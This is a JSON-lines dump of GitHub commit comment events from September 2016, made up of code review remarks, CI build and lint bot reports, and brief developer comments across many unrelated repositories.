{"id":"4593883930","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19107741,"position":null,"line":null,"path":null,"commit_id":"6f05df22bc28844ccd99519d6311887d45768977","created_at":"2016-09-21T03:42:46Z","updated_at":"2016-09-21T03:42:46Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-21T03:42:46Z"}
{"id":"4593887417","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107747,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T03:44:06Z","updated_at":"2016-09-21T03:44:06Z","body":"the return value should be a list of lists rather than a dict of lists.\r\n\r\nso `temp = []` here"}},"created_at":"2016-09-21T03:44:06Z"}
{"id":"4593890614","type":"CommitCommentEvent","actor":{"login":"zhiqiang1111"},"repo":{"name":"zhiqiang1111/asd"},"payload":{"comment":{"id":19107751,"position":1,"line":1,"path":"README.md","commit_id":"3b5faf6cdc3ca879bd39ab39927d9b6dfca9c715","created_at":"2016-09-21T03:45:16Z","updated_at":"2016-09-21T03:45:16Z","body":"add文件"}},"created_at":"2016-09-21T03:45:16Z"}
{"id":"4593895199","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107757,"position":14,"line":14,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T03:46:53Z","updated_at":"2016-09-21T03:46:53Z","body":"We will need to support a max height as well.\r\n\r\nLet's suppose text reads top to bottom and the text at the end of the input list is given higher priority. We could go through the input list in reverse order (going from the bottom row upward) and stop either when the list is empty or the height limit is reached."}},"created_at":"2016-09-21T03:46:53Z"}
{"id":"4593897583","type":"CommitCommentEvent","actor":{"login":"dm-albuquerque"},"repo":{"name":"dm-albuquerque/prj-CartorioOficial"},"payload":{"comment":{"id":19107762,"position":6,"line":6,"path":"src/Registros/AberturaFirma.java","commit_id":"8b50f3f745d69868245b4e8d7328c8f5cf32cd7d","created_at":"2016-09-21T03:47:46Z","updated_at":"2016-09-21T03:47:46Z","body":"comment test"}},"created_at":"2016-09-21T03:47:46Z"}
{"id":"4593899717","type":"CommitCommentEvent","actor":{"login":"champsupertramp"},"repo":{"name":"ultimatemember/ultimatemember"},"payload":{"comment":{"id":19107766,"position":16,"line":162,"path":"core/um-members.php","commit_id":"a85a687ba7f78c45af2777535e1e67cbe3dd1104","created_at":"2016-09-21T03:48:30Z","updated_at":"2016-09-21T03:48:30Z","body":"Hi @wpdelighter \r\n\r\nPlease check out this new parameter `number` to retrieve specific number of members:\r\nhttps://github.com/ultimatemember/ultimatemember/commit/4d9ddb76ade43bee7363ab467f4bd2737dcad41d#diff-fd9883148fb2a4a73350464ef1a69e05R159\r\n\r\nRegards,"}},"created_at":"2016-09-21T03:48:30Z"}
{"id":"4593900595","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107768,"position":24,"line":24,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T03:48:49Z","updated_at":"2016-09-21T03:48:49Z","body":"Isn't this if always true"}},"created_at":"2016-09-21T03:48:49Z"}
{"id":"4593906003","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107774,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T03:50:52Z","updated_at":"2016-09-21T03:50:52Z","body":"I just found how to fix the lighting bug, it's easy when you know how."}},"created_at":"2016-09-21T03:50:52Z"}
{"id":"4593907456","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107778,"position":18,"line":18,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T03:51:24Z","updated_at":"2016-09-21T03:51:24Z","body":"Correcting (moving) after some chars have been placed is a little tricky. Maybe it would be easier to look ahead to the next space when starting a word, and if the word is too long for the current line, immediately start a new line?"}},"created_at":"2016-09-21T03:51:24Z"}
{"id":"4593910899","type":"CommitCommentEvent","actor":{"login":"ricea"},"repo":{"name":"whatwg/streams"},"payload":{"comment":{"id":19107781,"position":29,"line":449,"path":"reference-implementation/test/transform-stream.js","commit_id":"cad1cc1af39fbcac7938906be455abe9372682a1","created_at":"2016-09-21T03:52:35Z","updated_at":"2016-09-21T03:52:35Z","body":"It's not obvious to me why this is not okay. Would it be possible to change the test description to describe the correctness invariant that is being enforced?"}},"created_at":"2016-09-21T03:52:35Z"}
{"id":"4593913026","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/LinqExpressionSnippets"},"payload":{"comment":{"id":19107789,"position":null,"line":null,"path":null,"commit_id":"d6d53dd453b416936dda55b49b5f64baf240078b","created_at":"2016-09-21T03:53:23Z","updated_at":"2016-09-21T03:53:23Z","body":"꼬우면 님도 프라이빗으로 파셈 ㅎ"}},"created_at":"2016-09-21T03:53:23Z"}
{"id":"4593915554","type":"CommitCommentEvent","actor":{"login":"evanmhm"},"repo":{"name":"FRCTools/Attendance-Client"},"payload":{"comment":{"id":19107792,"position":null,"line":null,"path":null,"commit_id":"89a697104d40828190b544335d9e5ee73b0cd069","created_at":"2016-09-21T03:54:21Z","updated_at":"2016-09-21T03:54:21Z","body":"Also make enter trigger sign in/out"}},"created_at":"2016-09-21T03:54:21Z"}
{"id":"4593916514","type":"CommitCommentEvent","actor":{"login":"Loind1206"},"repo":{"name":"Loind1206/parentandchild"},"payload":{"comment":{"id":19107793,"position":1,"line":1,"path":"README.md","commit_id":"771d874f9db5c3c58310a8c9a57cf2a0752f6b7d","created_at":"2016-09-21T03:54:43Z","updated_at":"2016-09-21T03:54:43Z","body":"Let's do it"}},"created_at":"2016-09-21T03:54:43Z"}
{"id":"4593918913","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19107803,"position":null,"line":null,"path":null,"commit_id":"c485fc068468c4de8809715d2ba9a01c80e5398f","created_at":"2016-09-21T03:55:35Z","updated_at":"2016-09-21T03:55:35Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-21T03:55:35Z"}
{"id":"4593920379","type":"CommitCommentEvent","actor":{"login":"bootstraponline"},"repo":{"name":"google/EarlGrey"},"payload":{"comment":{"id":19107804,"position":4,"line":16,"path":"gem/spec/project_diff.rb","commit_id":"ba8b46798fe373d1691f3c3c73b9ec6f19a05a20","created_at":"2016-09-21T03:56:05Z","updated_at":"2016-09-21T03:56:05Z","body":"This isn't the right way to disable the warning. You'll need to edit the `.rubocop.yml` file to apply this style change globally."}},"created_at":"2016-09-21T03:56:05Z"}
{"id":"4593921177","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107805,"position":18,"line":17,"path":"src/game_state.py","commit_id":"26095c4caf0b638886f3eb7d408994a290d4c349","created_at":"2016-09-21T03:56:23Z","updated_at":"2016-09-21T03:56:23Z","body":"Although path is arbitrary for now, please use a relative path (one without C:/User/ -- this will make the file in the current working directory) -- Don't commit the save files you create, though. (you can add GameState.txt to the .gitignore to automate this)"}},"created_at":"2016-09-21T03:56:23Z"}
{"id":"4593922839","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107807,"position":22,"line":21,"path":"src/game_state.py","commit_id":"26095c4caf0b638886f3eb7d408994a290d4c349","created_at":"2016-09-21T03:56:57Z","updated_at":"2016-09-21T03:56:57Z","body":"`pass` is a placeholder when no method body is defined -- you can remove it once you insert code"}},"created_at":"2016-09-21T03:56:57Z"}
{"id":"4593927675","type":"CommitCommentEvent","actor":{"login":"spexican924"},"repo":{"name":"spexican924/photoProject"},"payload":{"comment":{"id":19107817,"position":null,"line":null,"path":null,"commit_id":"9e354835f037d4d1cda82d6c4dea37066d5d7db4","created_at":"2016-09-21T03:58:52Z","updated_at":"2016-09-21T03:58:52Z","body":"Netbeans and I are now friends. Long live the glorious revolution between man and machine."}},"created_at":"2016-09-21T03:58:52Z"}
{"id":"4593938039","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":19107828,"position":null,"line":null,"path":null,"commit_id":"62df6deb2006d6399a5a3418fd15af25277c8b75","created_at":"2016-09-21T04:02:40Z","updated_at":"2016-09-21T04:02:40Z","body":"Bonus question : shall we remove the MS prefix Event support, and assume that nobody uses IE10 for gaming ?"}},"created_at":"2016-09-21T04:02:40Z"}
{"id":"4593938690","type":"CommitCommentEvent","actor":{"login":"Marquis103"},"repo":{"name":"Alamofire/AlamofireImage"},"payload":{"comment":{"id":19107830,"position":193,"line":127,"path":"Source/Request+AlamofireImage.swift","commit_id":"9577e7c17cdb092716c99e288ee5c3933dbad7b6","created_at":"2016-09-21T04:02:56Z","updated_at":"2016-09-21T04:02:56Z","body":"This failed for me in swift 3.  I changed the line to\r\nreturn response(responseSerializer: DataRequest.imageResponseSerializer(imageScale: imageScale, inflateResponseImage: inflateResponseImage), completionHandler: completionHandler)"}},"created_at":"2016-09-21T04:02:56Z"}
{"id":"4593941685","type":"CommitCommentEvent","actor":{"login":"mpkh"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19107840,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T04:04:09Z","updated_at":"2016-09-21T04:04:09Z","body":"@thankjura да, в баге по ссылке патч, который надо применить насколько я помню"}},"created_at":"2016-09-21T04:04:09Z"}
{"id":"4593949982","type":"CommitCommentEvent","actor":{"login":"zanchey"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19107854,"position":44,"line":90,"path":"configure.ac","commit_id":"06c658dd5e8d331badd0589274e061b28e1eaac8","created_at":"2016-09-21T04:07:11Z","updated_at":"2016-09-21T04:07:11Z","body":"@floam, is there a reason to prefer Clang? I don't understand the comment."}},"created_at":"2016-09-21T04:07:11Z"}
{"id":"4593953603","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19107868,"position":null,"line":null,"path":null,"commit_id":"fc74b6309f0c889f61e0d1916349b1d1e030f302","created_at":"2016-09-21T04:08:39Z","updated_at":"2016-09-21T04:08:39Z","body":"[R/irlba.R:300:1:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/R/irlba.R#L300) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:342:9:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/R/irlba.R#L342) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:635:5:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/R/irlba.R#L635) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/fc74b6309f0c889f61e0d1916349b1d1e030f302/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T04:08:39Z"}
{"id":"4593955491","type":"CommitCommentEvent","actor":{"login":"parasyte"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":19107872,"position":null,"line":null,"path":null,"commit_id":"62df6deb2006d6399a5a3418fd15af25277c8b75","created_at":"2016-09-21T04:09:24Z","updated_at":"2016-09-21T04:09:24Z","body":"😄 Microsoft abandoned IE10."}},"created_at":"2016-09-21T04:09:24Z"}
{"id":"4593959834","type":"CommitCommentEvent","actor":{"login":"shakuzen"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19107892,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-21T04:11:15Z","updated_at":"2016-09-21T04:11:15Z","body":"The conditionals on the build system make sense to me, but conditionals on the IDE used when generating the project make less sense. People who work on the project other than the person who generated the project may use a different IDE. What is the harm in adding all of them to the generated ignore file?"}},"created_at":"2016-09-21T04:11:15Z"}
{"id":"4593960596","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107895,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T04:11:34Z","updated_at":"2016-09-21T04:11:34Z","body":"ReplaceEPLaunchLite (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (2337 of 2339 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T04:11:34Z"}
{"id":"4593963496","type":"CommitCommentEvent","actor":{"login":"Aleksey-Terzi"},"repo":{"name":"Diet-Cola/FactoryMod"},"payload":{"comment":{"id":19107901,"position":null,"line":null,"path":null,"commit_id":"172cd9d4b98f2dc6a19b7a9da57c295bed502bb9","created_at":"2016-09-21T04:12:49Z","updated_at":"2016-09-21T04:12:49Z","body":"Is this recipe change already on Devoted?  \r\nShould I update recipe's page?"}},"created_at":"2016-09-21T04:12:49Z"}
{"id":"4593963671","type":"CommitCommentEvent","actor":{"login":"sakieltang"},"repo":{"name":"BelledonneCommunications/linphone-iphone"},"payload":{"comment":{"id":19107903,"position":null,"line":null,"path":null,"commit_id":"5a785b7b9d41b0ede7d29ba4fcdbd21441d75d0b","created_at":"2016-09-21T04:12:55Z","updated_at":"2016-09-21T04:12:55Z","body":"hi, \nIn fact, i try to upload one screen snap in that comment, but it failed. I already downloaded the libiphone and sdk, but i can not compile it successfully.\n\n\nTANG\n\n\n\n\n\n\nAt 2016-09-20 19:50:22, \"Joost Hoogendoorn\" <notifications@github.com> wrote:\n\n\n@sakieltang What doesn't work? Can you give more info? Maybe I can help, as I'm trying to get the latest code to run on iOS 10 with Xcode8 too. For me it only crashes on the phone now as soon as I'm having contacts in my contactbook.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-21T04:12:55Z"}
{"id":"4593965364","type":"CommitCommentEvent","actor":{"login":"sijusp"},"repo":{"name":"sijusp/imad-2016-app"},"payload":{"comment":{"id":19107907,"position":5,"line":8,"path":"ui/index.html","commit_id":"94ed168eefe4b1a1720f9ec13b9fd85024ab6ddb","created_at":"2016-09-21T04:13:38Z","updated_at":"2016-09-21T04:13:38Z","body":"![h](https://cloud.githubusercontent.com/assets/22217351/18697545/c708e1ca-7fdf-11e6-8dea-1fad3c12503a.png)\r\n"}},"created_at":"2016-09-21T04:13:38Z"}
{"id":"4593967976","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19107910,"position":74,"line":126,"path":"xwiki-platform-core/xwiki-platform-rendering/xwiki-platform-rendering-macros/xwiki-platform-rendering-macro-gallery/src/main/java/org/xwiki/rendering/internal/macro/gallery/GalleryMacro.java","commit_id":"fe99128dbc7bbea586beeabf19e9d660ee23f657","created_at":"2016-09-21T04:14:47Z","updated_at":"2016-09-21T04:14:47Z","body":"You are not forced to always use the in-line style. If your custom styles apply to multiple gallery instances then obviously it's better to use the class parameter and to associate the custom styles to a CSS class:\r\n\r\n    {{gallery class=\"myGallery col-xs-12 col-sm-6 col-md-4\"}}\r\n    ...\r\n    {{/gallery}}\r\n\r\nBut if you want a particular gallery instance to have a specific width/height then there's no other way than using the in-line style. When you set the image width/height from wiki syntax:\r\n\r\n    [[[[image:attach:Path.To.Page@file.png||width=\"200px\"]]>>attach:Path.To.Page@file.png]]\r\n\r\nthat's also in-line style (semantically)."}},"created_at":"2016-09-21T04:14:47Z"}
{"id":"4593969413","type":"CommitCommentEvent","actor":{"login":"sidkshatriya"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19107913,"position":15,"line":24,"path":"src/MmappedFileMonitor.cc","commit_id":"539c64c3861bf49c468faccf2467a0ab3db80f16","created_at":"2016-09-21T04:15:22Z","updated_at":"2016-09-21T04:15:22Z","body":"Sorry if I'm missing this for something else -- my C++ is a bit rusty...\r\n\r\n`extant_ = !!f;`\r\n\r\nIs there a reason why f is being double negated? Or is `!!` some other unary operator here?"}},"created_at":"2016-09-21T04:15:22Z"}
{"id":"4593971952","type":"CommitCommentEvent","actor":{"login":"tslmy"},"repo":{"name":"ckwatson/kernel"},"payload":{"comment":{"id":19107918,"position":null,"line":null,"path":null,"commit_id":"de1bff0a73a9c3e7d9599f1ec00eff7fd7bb3d1d","created_at":"2016-09-21T04:16:21Z","updated_at":"2016-09-21T04:16:21Z","body":"Oh. I actually have made a fix of this in the `plotter.py`. But your approach makes more sense anyways."}},"created_at":"2016-09-21T04:16:21Z"}
{"id":"4593979096","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107934,"position":3,"line":3,"path":"templates/jinja2/dashboard/dashboard.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:19:26Z","updated_at":"2016-09-21T04:19:26Z","body":"how come this one has `| Pinecast` but the others do not?"}},"created_at":"2016-09-21T04:19:26Z"}
{"id":"4593980139","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107938,"position":3,"line":3,"path":"templates/jinja2/dashboard/podcast/page_delete.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:19:54Z","updated_at":"2016-09-21T04:19:54Z","body":"`{{ _('Delete Podcast: %s`', podcast.name) }}`?"}},"created_at":"2016-09-21T04:19:54Z"}
{"id":"4593980339","type":"CommitCommentEvent","actor":{"login":"shivamkmani"},"repo":{"name":"shivamkmani/hello-world"},"payload":{"comment":{"id":19107939,"position":8,"line":21,"path":"README.md","commit_id":"b48c1aa3fa069ecf8c5a8941f68219ee31533af3","created_at":"2016-09-21T04:20:00Z","updated_at":"2016-09-21T04:20:00Z","body":"Shivam"}},"created_at":"2016-09-21T04:20:00Z"}
{"id":"4593980853","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107941,"position":3,"line":3,"path":"templates/jinja2/dashboard/podcast/page_edit.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:20:14Z","updated_at":"2016-09-21T04:20:14Z","body":"`{{ _('Edit Podcast: %s', podcast.name) }}`?"}},"created_at":"2016-09-21T04:20:14Z"}
{"id":"4593981957","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107946,"position":3,"line":3,"path":"templates/jinja2/dashboard/podcast/page_podcast.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:20:44Z","updated_at":"2016-09-21T04:20:44Z","body":"same here?"}},"created_at":"2016-09-21T04:20:44Z"}
{"id":"4593982270","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107947,"position":3,"line":3,"path":"templates/jinja2/dashboard/sites/page_delete.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:20:52Z","updated_at":"2016-09-21T04:20:52Z","body":"typo: `Sitee`"}},"created_at":"2016-09-21T04:20:52Z"}
{"id":"4593983390","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107957,"position":3,"line":3,"path":"templates/jinja2/login.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:21:20Z","updated_at":"2016-09-21T04:21:20Z","body":"this should be `Log In` (or `Sign In`, if you want to be consistent with the wording you use on the `www` page)"}},"created_at":"2016-09-21T04:21:20Z"}
{"id":"4593984010","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107959,"position":3,"line":3,"path":"templates/jinja2/payments/tip_jar/base.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:21:36Z","updated_at":"2016-09-21T04:21:36Z","body":"You don't want to mention `Tip` in the title?"}},"created_at":"2016-09-21T04:21:36Z"}
{"id":"4593984428","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19107960,"position":7,"line":7,"path":"templates/jinja2/signup/main.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:21:49Z","updated_at":"2016-09-21T04:21:49Z","body":"why the `?`"}},"created_at":"2016-09-21T04:21:49Z"}
{"id":"4593985183","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107961,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T04:22:10Z","updated_at":"2016-09-21T04:22:10Z","body":"GetInternalVariableBug (mjwitte) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T04:22:10Z"}
{"id":"4593986618","type":"CommitCommentEvent","actor":{"login":"vrv"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19107964,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T04:22:49Z","updated_at":"2016-09-21T04:22:49Z","body":"Interesting, that shouldn't happen.  I'll try to take a look."}},"created_at":"2016-09-21T04:22:49Z"}
{"id":"4593988132","type":"CommitCommentEvent","actor":{"login":"initiumSrc"},"repo":{"name":"initiumSrc/EITF05-webshop"},"payload":{"comment":{"id":19107965,"position":null,"line":null,"path":null,"commit_id":"bc06cb474e0789883834cfb5c8f9d235c019f213","created_at":"2016-09-21T04:23:34Z","updated_at":"2016-09-21T04:23:34Z","body":"The idea is to pass the password and the $_SESSION['username']"}},"created_at":"2016-09-21T04:23:34Z"}
